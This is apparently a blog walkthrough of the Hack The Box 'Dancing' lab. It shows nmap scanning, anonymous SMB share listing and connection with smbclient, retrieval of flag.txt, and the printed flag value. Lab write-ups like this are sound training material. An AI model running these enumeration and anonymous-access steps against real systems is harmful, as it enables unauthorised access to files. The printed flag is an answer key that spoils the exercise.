RUN!
74 words
1 minute
Dancing
18 hours ago
Machine Information
  • Platform: HTB
  • Lab: Starting Point
  • OS: Windows
  • Difficulty: Very Easy
  • IP: 10.129.1.12

Step 0: Getting Started#

If you’re not sure how to get started, this will help.

Terminal window
mkdir -p HTB/LAB/DANCING && cd HTB/LAB/DANCING
IP=10.129.1.12 && ping -c 2 $IP

See also: Here.

YEP!


Step 1: Recon#

Terminal window
nmap -sC -sV $IP

HTB-Dancing 1

445/tcp (SMB) is open. Try microsoft-ds — SMB share enumeration.


Step 2: Solution#

SMB Share List#

Terminal window
smbclient -L //$IP # list
Terminal window
smbclient -N //$IP/WorkShares # Connect

Password: Enter

Flag#

Terminal window
ls
cd James.P
ls
get flag.txt
exit

Flag#

Terminal window
cat flag.txt

HTB-Dancing 2

5f61c10dffbc77a704d76016a22f1664

and PASTE!

Dancing
https://www.hackthebox.com/
Author
Alp
Published at
2026-03-17
License
CC BY-NC-SA 4.0

Some information may be outdated